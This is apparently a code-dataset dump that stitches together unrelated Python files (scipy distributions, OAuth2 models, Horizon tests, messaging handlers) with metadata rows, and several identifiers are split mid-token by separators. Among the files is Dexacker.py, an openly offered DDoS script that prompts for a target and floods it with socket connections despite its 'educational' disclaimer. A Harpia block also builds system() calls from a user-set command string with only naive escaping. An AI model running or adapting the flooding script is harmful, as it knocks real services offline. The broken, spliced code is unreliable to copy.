def _sf(self, x, n):
return sc.smirnov(n, x)
def _ppf(self, q, n):
return scu._smirnovci(n, q)
def _isf(self, q, n):
return sc.smirnovi(n, q)
ksone = ksone_gen(a=0.0, b=1.0, name='ksone')
class kstwobign_gen(rv_continuous):
r"""Kolmogorov-Smirnov two-sided test for large N.
This is the asymptotic distribution of the two-sided Kolmogorov-Smirnov
statistic :math:`\sqrt{n} D_n` that measures the maximum absolute
distance of the theoretical CDF from the empirical CDF (see `kstest`).
%(before_notes)s
Notes
-----
:math:`\sqrt{n} D_n` is given by
.. math::
D_n = \text{sup}_x |F_n(x) - F(x)|
where :math:`F` is a CDF and :math:`F_n` is an empirical CDF. `kstwobign`
describes the asymptotic distribution (i.e. the limit of
:math:`\sqrt{n} D_n`) under the null hypothesis of the KS test that the
empirical CDF corresponds to i.i.d. random variates with CDF :math:`F`.
%(after_notes)s
See Also
--------
ksone, kstest
References
----------
.. [1] Marsaglia, G. et al. "Evaluating Kolmogorov's distribution",
Journal of Statistical Software, 8(18), 2003.
%(example)s
"""
def _pdf(self, x):
return -scu._kolmogp(x)
def _cdf(self, x):
return scu._kolmogc(x)
def _sf(self, x):
return sc.kolmogorov(x)
def _ppf(self, q):
return scu._kolmogci(q)
def _isf(self, q):
return sc.kolmogi(q)
kstwobign = kstwobign_gen(a=0.0, name='kstwobign')
## Normal distribution
# loc = mu, scale = std
# Keep these implementations out of the class definition so they can be reused
# by other distributions.
_norm_pdf_C = np.sqrt(2*np.pi)
_norm_pdf_logC = np.log(_norm_pdf_C)
def _norm_pdf(x):
return np.exp(-x**2/2.0) / _norm_pdf_C
def _norm_logpdf(x):
return -x**2 / 2.0 - _norm_pdf_logC
def _norm_cdf(x):
return sc.ndtr(x)
def _norm_logcdf(x):
return sc.log_ndtr(x)
def _norm_ppf(q):
return sc.ndtri(q)
def _norm_sf(x):
return _norm_cdf(-x)
def _norm_logsf(x):
return _norm_logcdf(-x)
def _norm_isf(q):
return -_norm_ppf(q)
class norm_gen(rv_continuous):
r"""A normal continuous random variable.
The location (``loc``) keyword specifies the mean.
The scale (``scale``) keyword specifies the standard deviation.
%(before_notes)s
Notes
-----
The probability density function for `norm` is:
.. math::
f(x) = \frac{\exp(-x^2/2)}{\sqrt{2\pi}}
for a real number :math:`x`.
%(after_notes)s
%(example)s
"""
def _rvs(self):
return self._random_state.standard_normal(self._size)
def _pdf(self, x):
# norm.pdf(x) = exp(-x**2/2)/sqrt(2*pi)
return _norm_pdf(x)
def _logpdf(self, x):
return _norm_logpdf(x)
def _cdf(self, x):
return _norm_cdf(x)
def _logcdf(self, x):
return _norm_log
|
cdf(x)
def _sf(self, x):
return _norm_sf(x)
def _logsf(self, x):
return _norm_logsf(x)
def _ppf(self, q):
return _norm_ppf(q)
def _i
|
sf(self, q):
return _norm_isf(q)
def _stats(self):
return 0.0, 1.0, 0.0, 0.0
def _entropy(self):
return 0.5*(np.log(2*np.pi)+1)
@replace_notes_in_docstring(rv_continuous, notes="""\
This function uses explicit formulas for the maximum likelihood
estimation of the normal distribution parameters, so the
`optimizer` argument is ignored.\n\n""")
def fit(self, data, **kwds):
floc = kwds.pop('floc', None)
fscale = kwds.pop('fscale', None)
_remove_optimizer_parameters(kwds)
if floc is not None and fscale is not None:
# This check is for consistency with `rv_continuous.fit`.
# Without this check, this function would just return the
# parameters that were given.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
data = np.asarray(data)
if floc is None:
loc = data.mean()
else:
loc = floc
if fscale is None:
scale = np.sqrt(((data - loc)**2).mean())
else:
scale = fscale
return loc, scale
norm = norm_gen(name='norm')
class alpha_gen(rv_continuous):
r"""An alpha continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `alpha` ([1]_, [2]_) is:
.. math::
f(x, a) = \frac{1}{x^2 \Phi(a) \sqrt{2\pi}} *
\exp(-\frac{1}{2} (a-1/x)^2)
where :math:`\Phi` is the normal CDF, :math:`x > 0`, and :math:`a > 0`.
`alpha` takes ``a`` as a shape parameter.
%(after_notes)s
References
----------
.. [1] Johnson, Kotz, and Balakrishnan, "Continuous Univariate
Distributions, Volume 1", Second Edition, John Wiley and Sons,
p. 173 (1994).
.. [2] Anthony A. Salvia, "Reliability applications
|
Exterminus/harpia
|
harpia/bpGUI/runCmd.py
|
Python
|
gpl-2.0
| 6,533
| 0.002756
|
# -*- coding: utf-8 -*-
# [HARPIA PROJECT]
#
#
# S2i - Intelligent Industrial Systems
# DAS - Automation and Systems Department
# UFSC - Federal University of Santa Catarina
# Copyright: 2006 - 2007 Luis Carlos Dill Junges ([email protected]), Clovis Peruchi Scotti ([email protected]),
# Guilherme Augusto Rutzen ([email protected]), Mathias Erdtmann ([email protected]) and S2i (www.s2i.das.ufsc.br)
# 2007 - 2009 Clovis Peruchi Scotti ([email protected]), S2i (www.s2i.das.ufsc.br)
#
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranties of
# MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For further information, check the COPYING file distributed with this software.
#
# ----------------------------------------------------------------------
import gtk
from harpia.GladeWindow import GladeWindow
from harpia.s2icommonproperties import S2iCommonProperties, APP, DIR
# i18n
import os
from harpia.utils.XMLUtils import XMLParser
import gettext
_ = gettext.gettext
gettext.bindtextdomain(APP, DIR)
gettext.textdomain(APP)
# ----------------------------------------------------------------------
class Properties(GladeWindow, S2iCommonProperties):
# ----------------------------------------------------------------------
def __init__(self, PropertiesXML, S2iBlockProperties):
self.m_sDataDir = os.environ['HARPIA_DATA_DIR']
filename = self.m_sDataDir + 'glade/runCmd.ui'
self.m_oPropertiesXML = PropertiesXML
self.m_oS2iBlockProperties = S2iBlockProperties
widget_list = [
'Properties',
|
'cmdString',
'BackgroundColor',
|
'BorderColor',
'HelpView',
'enIsntZero'
]
handlers = [
'on_cancel_clicked',
'on_prop_confirm_clicked',
'on_BackColorButton_clicked',
'on_BorderColorButton_clicked'
]
top_window = 'Properties'
GladeWindow.__init__(self, filename, top_window, widget_list, handlers)
# load properties values
self.block_properties = self.m_oPropertiesXML.getTag("properties").getTag("block").getChildTags("property")
for Property in self.block_properties:
if Property.name == "cmdString":
self.widgets['cmdString'].set_text(Property.value)
if Property.name == "enIsntZero":
self.widgets['enIsntZero'].set_active(Property.value == "True")
self.configure()
# load help text
# t_oS2iHelp = XMLParser(self.m_sDataDir + "help/runCmd" + _("_en.help"))
# t_oTextBuffer = gtk.TextBuffer()
# t_oTextBuffer.set_text(unicode(str(t_oS2iHelp.getTag("help").getTag("content").getTagContent())))
# self.widgets['HelpView'].set_buffer(t_oTextBuffer)
#----------------Help Text--------------------------------------
def getHelp(self):#adicionado help
return "Executa uma chamada de sistema dependendo da avaliação binaria do pixel (0,0) da imagem de entrada."
# ----------------------------------------------------------------------
def __del__(self):
pass
# ----------------------------------------------------------------------
def on_prop_confirm_clicked(self, *args):
for Property in self.block_properties:
if Property.name == "cmdString":
Property.value = unicode(self.widgets['cmdString'].get_text())
if Property.name == "enIsntZero":
Property.value = unicode(self.widgets['enIsntZero'].get_active())
self.m_oS2iBlockProperties.SetPropertiesXML(self.m_oPropertiesXML)
self.m_oS2iBlockProperties.SetBorderColor(self.m_oBorderColor)
self.m_oS2iBlockProperties.SetBackColor(self.m_oBackColor)
self.widgets['Properties'].destroy()
# ----------------------------------------------------------------------
# propProperties = Properties()()
# propProperties.show( center=0 )
# ------------------------------------------------------------------------------
# Code generation
# ------------------------------------------------------------------------------
def generate(blockTemplate):
cmdString = 'echo no properties'
enIsntZero = False
for propIter in blockTemplate.properties:
if propIter[0] == 'cmdString':
cmdString = propIter[1]
if propIter[0] == 'enIsntZero':
enIsntZero = (propIter[1] == "True")
cmdString = cmdString.replace(r"'", r"\'")
cmdString = cmdString.replace(r'"', r'\"')
blockTemplate.imagesIO = \
'double block$$_double_i1;\n' + \
'double block$$_double_o1;\n'
blockTemplate.functionCall = '\nif('
if enIsntZero:
blockTemplate.functionCall += 'block$$_double_i1 > 0.0){\n'
else:
blockTemplate.functionCall += '1){\n'
blockTemplate.functionCall += 'char outPutStr[' + str(len(cmdString) + 30) + '];\n' + \
'snprintf(outPutStr,' + str(len(
cmdString) + 30) + ',"export HRP_DB=%f;' + cmdString + '",(float)block$$_double_i1);' + \
'system(outPutStr);}\n' + \
'block$$_double_o1 = block$$_double_i1;\n'
blockTemplate.dealloc = '//nothing to deallocate\n'
# ------------------------------------------------------------------------------
# Block Setup
# ------------------------------------------------------------------------------
def getBlock():
return {"Label": _("Run Command"),
"Path": {"Python": "runCmd",
"Glade": "glade/runCmd.ui",
"Xml": "xml/runCmd.xml"},
"Icon": "images/runCmd.png",
"Color": "200:200:60:150",
"InTypes": {0: "HRP_DOUBLE"},
"OutTypes": {0: "HRP_DOUBLE"},
"Description": _("Runs a shell command depending on the input value."),
"TreeGroup": _("Experimental")
}
|
xaccc/videoapiserver
|
testNotifyTCPServer.py
|
Python
|
gpl-2.0
| 1,234
| 0.024311
|
#coding=utf-8
#-*- encoding: utf-8 -*-
import tornado.ioloop
import tornado.iostream
import socket
import struct
import NotifyTCPServer
def readPacketHeader():
stream.read_bytes(NotifyTCPServer.PACKET_HEADER_LEN, parsePacketHeader)
def parsePacketHeader(data):
sign,cmd,bodySize = struct.unpack('>2sHH', data)
print "Sign: %s, Command: %s, Size: %s" % (sign,cmd,bodySize)
command=cmd
stream.read_bytes(bodySize, parsePacketBody)
def parsePacketBody(data):
print "Data: %s" % str(data)
if command == NotifyTCPServer.NOTIFY_COMMAND_PING:
send_ping(data)
readPacketHeader()
def send_register(userKey):
send_packet(NotifyTCPServer.NOTIFY_COMMAND_REGISTER, userKey)
def send_ping(msg):
send_packet(NotifyTCPServer.NOTIFY_COMMAND_PING, msg)
|
def send_packet(cmd, msg):
data = bytes(msg)
stream.write(struct.pack(">2sHH", "NT", cmd, len(data)))
stream.write(data)
def send_request():
readPacketHeader()
send_register('591410cbf9614cbf9aaa
|
c4a871ddb466')
command=0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
stream = tornado.iostream.IOStream(s)
stream.connect(("localhost", 9002), send_request)
#stream.connect(("221.180.20.232", 9002), send_request)
tornado.ioloop.IOLoop.instance().start()
|
specht/proteomatic-scripts
|
transpose-dna.defunct.py
|
Python
|
gpl-3.0
| 911
| 0.009879
|
#! /usr/bin/env python
import sys, os
sys.path.append('./include/python')
import proteomatic
import string
import re
class TransposeDna(proteomatic.ProteomaticScript):
def run(self):
# convert all characters to upper case
# Attention: parameters are Unicode
|
because of the JSON parser
# used behind the scenes, convert
|
nucleotides to ASCII string
dna = str(self.param['nucleotides']).upper()
# remove invalid characters
dna = re.sub('[^ACGT]', '', dna)
# reverse sequence
dna = dna[::-1]
# replace nucleotides
dna = dna.translate(string.maketrans('ACGT', 'TGCA'))
# output transposed DNA
print(dna)
if 'result' in self.output:
with open(self.output['result'], 'w') as f:
f.write(dna + "\n")
if __name__ == '__main__':
script = TransposeDna()
|
xrage/oauth2app-mongoDb
|
oauth2app/models.py
|
Python
|
mit
| 5,945
| 0.000168
|
#-*- coding: utf-8 -*-
"""OAuth 2.0 Django Models"""
import time
from hashlib import sha512
from uuid import uuid4
from django.db import models
from django.contrib.auth.models import User
from .consts import CLIENT_KEY_LENGTH, CLIENT_SECRET_LENGTH
from .consts import SCOPE_LENGTH
from .consts import ACCESS_TOKEN_LENGTH, REFRESH_TOKEN_LENGTH
from .consts import ACCESS_TOKEN_EXPIRATION, MAC_KEY_LENGTH, REFRESHABLE
from .consts import CODE_KEY_LENGTH, CODE_EXPIRATION
from djangotoolbox.fields import ListField
class TimestampGenerator(object):
"""Callable Timestamp Generator that returns a UNIX time integer.
**Kwargs:**
* *seconds:* A integer indicating how many seconds in the future the
timestamp should be. *Default 0*
*Returns int*
"""
def __init__(self, seconds=0):
self.seconds = seconds
def __call__(self):
return int(time.time()) + self.seconds
class KeyGenerator(object):
"""Callable Key Generator that returns a random keystring.
**Args:**
* *length:* A integer indicating how long the key should be.
*Returns str*
"""
def __init__(self, length):
self.length = length
def __call__(self):
return sha512(uuid4().hex).hexdigest()[0:self.length]
class Client(models.Model):
"""Stores client authentication data.
**Args:**
* *name:* A string representing the client name.
* *user:* A django.contrib.auth.models.User object representing the client
owner.
**Kwargs:**
* *description:* A string representing the client description.
*Default None*
* *key:* A string representing the client key. *Default 30 character
random string*
* *secret:* A string representing the client secret. *Default 30 character
random string*
* *redirect_uri:* A string representing the client redirect_uri.
*Default None*
"""
name = models.CharField(max_length=256)
user = models.ForeignKey(User)
description = models.TextField(null=True, blank=True)
key = models.CharField(
unique=True,
max_length=CLIENT_KEY_LENGTH,
default=KeyGenerator(CLIENT_KEY_LENGTH),
db_index=True)
secret = m
|
odels.CharField(
unique=True,
max_length=CLIENT_SECRET_LENGTH,
default=KeyGenerator(CLIENT_SECRET_LENGTH))
redir
|
ect_uri = models.URLField(null=True)
class AccessRange(models.Model):
"""Stores access range data, also known as scope.
**Args:**
* *key:* A string representing the access range scope. Used in access
token requests.
**Kwargs:**
* *description:* A string representing the access range description.
*Default None*
"""
key = models.CharField(unique=True, max_length=SCOPE_LENGTH, db_index=True)
description = models.TextField(blank=True)
class AccessToken(models.Model):
"""Stores access token data.
**Args:**
* *client:* A oauth2app.models.Client object
* *user:* A django.contrib.auth.models.User object
**Kwargs:**
* *token:* A string representing the access key token. *Default 10
character random string*
* *refresh_token:* A string representing the access key token. *Default 10
character random string*
* *mac_key:* A string representing the MAC key. *Default None*
* *expire:* A positive integer timestamp representing the access token's
expiration time.
* *scope:* A list of oauth2app.models.AccessRange objects. *Default None*
* *refreshable:* A boolean that indicates whether this access token is
refreshable. *Default False*
"""
client = models.ForeignKey(Client)
user = models.ForeignKey(User)
token = models.CharField(
unique=True,
max_length=ACCESS_TOKEN_LENGTH,
default=KeyGenerator(ACCESS_TOKEN_LENGTH),
db_index=True)
refresh_token = models.CharField(
unique=True,
blank=True,
null=True,
max_length=REFRESH_TOKEN_LENGTH,
default=KeyGenerator(REFRESH_TOKEN_LENGTH),
db_index=True)
mac_key = models.CharField(
blank=True,
null=True,
max_length=MAC_KEY_LENGTH,
default=None)
issue = models.PositiveIntegerField(
editable=False,
default=TimestampGenerator())
expire = models.PositiveIntegerField(
default=TimestampGenerator(ACCESS_TOKEN_EXPIRATION))
scope = ListField()
refreshable = models.BooleanField(default=REFRESHABLE)
class Code(models.Model):
"""Stores authorization code data.
**Args:**
* *client:* A oauth2app.models.Client object
* *user:* A django.contrib.auth.models.User object
**Kwargs:**
* *key:* A string representing the authorization code. *Default 30
character random string*
* *expire:* A positive integer timestamp representing the access token's
expiration time.
* *redirect_uri:* A string representing the redirect_uri provided by the
requesting client when the code was issued. *Default None*
* *scope:* A list of oauth2app.models.AccessRange objects. *Default None*
"""
client = models.ForeignKey(Client)
user = models.ForeignKey(User)
key = models.CharField(
unique=True,
max_length=CODE_KEY_LENGTH,
default=KeyGenerator(CODE_KEY_LENGTH),
db_index=True)
issue = models.PositiveIntegerField(
editable=False,
default=TimestampGenerator())
expire = models.PositiveIntegerField(
default=TimestampGenerator(CODE_EXPIRATION))
redirect_uri = models.URLField(null=True)
scope = ListField()
class MACNonce(models.Model):
"""Stores Nonce strings for use with MAC Authentication.
**Args:**
* *access_token:* A oauth2app.models.AccessToken object
* *nonce:* A unique nonce string.
"""
access_token = models.ForeignKey(AccessToken)
nonce = models.CharField(max_length=30, db_index=True)
|
Hexacker/Dexacker
|
Dexacker.py
|
Python
|
gpl-2.0
| 1,733
| 0.030006
|
#!/usr/bin/env python
#______________________________________#
#Dexacker is an open source tool developed by Abdelmadjd Cherfaoui
#Dexacker is designed for Educational Stuff to do a LEGAL DDOS Test and the developers is
# not responsible for ILLEGAL USES
#Contacting using:@Hexacker | fb.com/Hexacker
#http://www.hackercademy.com
#http://www.bringitsimple.com
#______________________________________#
#Importing Modules
import socket,os,sys,string
#Lunching Tool
print "Lunching Dexacker..."
print "Remember that Dexacker is an Educational Tool\nand you are responsible for any ILLEGAL USES\nThe Developer is not responsible for your behaviors "
#Default Settings
host = raw_input("Enter the website link you want to DDOS it: ")
port = int(raw_input("Enter the port you
|
want to Attack: "))
message = raw_input("Write the message you want to send it: ")
connections = int(raw_input("How many beat you want to make: " ))
IP = socket.gethostbyname(host)
#/
#The Attacking Function
def Attack():
attack = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
attack.connect((host,80))
attack.send(message)
attack.sendto(message, (I
|
P,port))
attack.send(message);
except socket.error,msg:
print "Connection Failed"
print "DDOS Attack Lunched"
attack.close()
for i in range(1,connections):
Attack()
print "______________________________________"
print "The Operation is finished"
#this is the restaring function
def Restart():
program = sys.executable
os.execl(program,program,* sys.argv)
CurDirectory = os.getcwd()
if __name__ == "__main__":
request = raw_input("Do you start over? Y or N :")
if request.strip() in "y Y yes Yes YES YEs yES".split():
Restart()
else:
os.system(CurDirectory+"Dexacker.py")
|
jawilson/home-assistant
|
homeassistant/components/plant/group.py
|
Python
|
apache-2.0
| 421
| 0
|
"""Describe group states."""
from homeassistant.components.group import GroupIntegration
|
Registry
f
|
rom homeassistant.const import STATE_OK, STATE_PROBLEM
from homeassistant.core import HomeAssistant, callback
@callback
def async_describe_on_off_states(
hass: HomeAssistant, registry: GroupIntegrationRegistry
) -> None:
"""Describe group on off states."""
registry.on_off_states({STATE_PROBLEM}, STATE_OK)
|
394954369/horizon
|
openstack_dashboard/dashboards/project/volumes/volumes/tests.py
|
Python
|
apache-2.0
| 49,698
| 0.001127
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import django
from django.conf import settings
from django.core.urlresolvers import reverse
from django.forms import widgets
from django import http
from mox import IsA # noqa
from openstack_dashboard import api
from openstack_dashboard.api import cinder
from openstack_dashboard.dashboards.project.volumes \
.volumes import tables
from openstack_dashboard.test import helpers as test
from openstack_dashboard.usage import quotas
VOLUME_INDEX_URL = reverse('horizon:project:volumes:index')
VOLUME_VOLUMES_TAB_URL = reverse('horizon:project:volumes:volumes_tab')
class VolumeViewTests(test.TestCase):
@test.create_stubs({cinder: ('volume_create',
'volume_snapshot_list',
'volume_type_list',
'volume_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume(self):
volume = self.cinder_volumes.first()
volume_type = self.volume_types.first()
az = self.cinder_availability_zones.first().zoneName
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'type': volume_type.name,
'size': 50,
'snapshot_source': '',
'availability_zone': az}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False, False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False, False])
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.volume_list(IsA(
http.HttpRequest)).AndReturn(self.cinder_volumes.list())
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
formData['type'],
metadata={},
snapshot_id=None,
image_id=None,
availability_zone=formData['availability_zone'],
source_volid=None)\
.AndReturn(volume)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post(url, formData)
redirect_url = VOLUME_VOLUMES_TAB_URL
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_create',
'volume_snapshot_list',
'volume_type_list',
'volume_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_dropdown(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'no_source_type',
'snapshot_source': self.cinder_volume_snapshots.first().id,
'image_source': self.images.first().id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False, False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False, False])
cinder.volume_list(IsA(
http.HttpRequest)).AndReturn(self.cinder_volumes.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
cinder.volume_create(IsA(http.HttpRequest),
formData['size
|
'],
formData['name'],
formData['description'],
'',
metadata={},
snapshot_id=None,
|
image_id=None,
availability_zone=None,
source_volid=None).AndReturn(volume)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post(url, formData)
redirect_url = VOLUME_VOLUMES_TAB_URL
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_create',
'volume_snapshot_get',
'volume_get',
'volume_type_list'),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_snapshot(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
|
mattvryan/audiofile
|
afmq/__init__.py
|
Python
|
mit
| 3,351
| 0.021486
|
#!/usr/bin/env python
# encoding: utf-8
"""
__init__.py
The MIT License (MIT)
Copyright (c) 2013 Matt Ryan
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software
|
is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING
|
BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import sys
import os
import stomp
import json
import afutils.file_pattern as pattern
from aflib3 import AFLibraryEntry
class AFMQ:
'''Represents a basic connection to an ActiveMQ
service for AudioFile.
'''
def __init__(self, queue_name):
self.queue_name = queue_name
self.queue_handle = stomp.Connection()
self.queue_handle.start()
self.queue_handle.connect()
self.queue_handle.subscribe(destination=queue_name, ack='auto')
def __del__(self):
self.queue_handle.disconnect()
def put(self, msg):
self.queue_handle.send(msg, destination=self.queue_name)
class BasicHandler:
'''Represents an ActiveMQ handler that consumes information
from the queue.
'''
def __init__(self, aflib, queue_name):
self.aflib = aflib
self.queue_name = queue_name
self.queue_handle = stomp.Connection()
self.queue_handle.set_listener(queue_name, self)
self.queue_handle.start()
self.queue_handle.connect()
self.queue_handle.subscribe(destination=queue_name, ack='auto')
def __del__(self):
self.queue_handle.stop()
def on_error(self, headers, message):
print '%s: Received an error: "%s"' % (self.__class__, message)
def on_message(self, headers, message):
print '%s: Received message: "%s"' % (self.__class__, message)
class AddFileHandler(BasicHandler):
'''Adds files to the AudioFile library as the files
are posted into a queue.
'''
def __init__(self, aflib):
BasicHandler.__init__(self, aflib, '/audiofile/library_additions')
def on_message(self, headers, message):
BasicHandler.on_message(self, headers, message)
args = json.loads(message)
self.aflib.add_mp3(args[0], args[1])
class RenameFileHandler(BasicHandler):
'''Renames files from the old path to the new specified
path as the information is put into a queue.
'''
def __init__(self, aflib):
BasicHandler.__init__(self, aflib, '/audiofile/file_renames')
def on_message(self, headers, message):
BasicHandler.on_message(self, headers, message)
args = json.loads(message)
song = AFLibraryEntry()
song.apply_dict(args[0])
newpath = pattern.get_new_path(song, args[1])
print 'Renaming "%s" as "%s"...' % (song.path, newpath)
os.rename(song.path, newpath)
if __name__ == '__main__':
pass
|
dhruvilpatel/citation
|
citation/management/commands/validate_urls.py
|
Python
|
gpl-3.0
| 389
| 0.002571
|
import loggi
|
ng
from django.core.management.base import BaseCommand
from citation.ping_urls import verify_url_status
logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = '''Method that check if the code archived urls are active and working or not '''
def handle(self, *args, **options):
verify_url_status()
logger.debug("Vali
|
dation completed")
|
clicheio/cliche
|
cliche/web/adv_search.py
|
Python
|
mit
| 2,111
| 0
|
from flask import Blueprint, flash, redirect, render_template, request, url_for
from sqlalchemy.orm.exc import NoResultFound
from ..sqltypes import HashableLocale as Locale
from ..work import Trope, Work
from .db import session
adv_search_bp = Blueprint('adv_search', __name__)
@adv_search_bp.route('/', methods=['POST'])
def result():
about = request.form.getlist('about[]', None)
category = request.form.getlist('category[]', None)
detail = request.form.getlist('detail[]', None)
error_redirect = redirect(url_for('index'))
if about is None or category is None or detail is None:
flash('Invalid arguments.', 'danger')
return error_redirect
if type(about) != list or type(category) != list or type(detail) != list:
flash('Invalid arguments..', 'danger')
return error_redirect
if len(about) != len(category) or len(about) != len(detail):
flash('Invalid arguments...', 'danger')
return error_redirect
query = zip(about, category, detail)
media_list = []
trope_filter = None
for
|
about, category, detail in query:
if about == 'info':
if category == 'media':
media_list.append(detail)
elif about == 'trope':
try:
trope = session.query(Trope).get(detail)
|
except NoResultFound:
return error_redirect
if trope_filter is None:
trope_filter = Work.tropes.any(Trope.id == trope.id)
else:
trope_filter = trope_filter & \
Work.tropes.any(Trope.id == trope.id)
if not media_list and trope_filter is None:
flash('Invalid arguments....', 'danger')
return error_redirect
result = session.query(
Work,
Work.canonical_name(Locale.parse('en_US')).label('canonical_name')
)
if media_list:
result = result.filter(Work.media_type.in_(media_list))
if trope_filter is not None:
result = result.filter(trope_filter)
return render_template('adv_search/result.html', result=result)
|
ajportier/raspi-gpio-work
|
light-toggle/server.py
|
Python
|
gpl-2.0
| 1,463
| 0.005468
|
#!/usr/bin/env python
from flask import (Flask, request, render_template)
from flask.ext import restful
from flask.ext.restful import reqparse
import pickle
SETTINGS_P = 'settings.p'
app = Flask(__name__)
api = restful.Api(app)
def get_settings():
settings = {'state':'off'}
try:
settings = pickle.load(open(SETTINGS_P, 'rb'))
except IOError:
pass
return settings
def set_state(state):
settings = get_settings()
settings['state'] = state
pickle.dump( settings, open(SETTINGS_P, 'wb'))
# Restful Resource for setting the light state
@api.resource('/api/state')
clas
|
s SetState(restful.Resource):
def get(self):
settings = get_settings()
|
parser = reqparse.RequestParser()
parser.add_argument('value', type=str, location='args',
choices=['on','off'])
args = parser.parse_args()
value = args['value']
if value:
set_state(value)
settings = get_settings()
print "Setting state to {}".format(value)
return {'state':settings['state']}
# View to present a form to change the light state
@app.route('/', methods=['GET','POST'])
def index():
if request.method == 'POST':
set_state(request.form['state'])
settings = get_settings()
state = settings['state']
return render_template('index.html', state=state)
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True)
|
JulyKikuAkita/PythonPrac
|
cs15211/NestedListWeightSum.py
|
Python
|
apache-2.0
| 4,780
| 0.004603
|
__source__ = 'https://leetcode.com/problems/nested-list-weight-sum/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/nested-list-weight-sum.py
# Time: O(n)
# Space: O(h)
#
# Description: Leetcode # 339. Nested List Weight Sum
#
# Given a nested list of integers, return the sum of all integers in the list weighted by their depth.
#
# Each element is either an integer, or a list -- whose elements may also be integers or other lists.
#
# Example 1:
# Given the list [[1,1],2,[1,1]], return 10. (four 1's at depth 2, one 2 at depth 1)
#
# Example 2:
# Given the list [1,[4,[6]]], return 27. (one 1 at depth 1, one 4 at depth 2, and one 6 at depth 3; 1 + 4*2 + 6*3 = 27)
#
# Companies
# LinkedIn
# Related Topics
# Depth-first Search
# Similar Questions
# Nested List Weight Sum II Array Nesting
#
# """
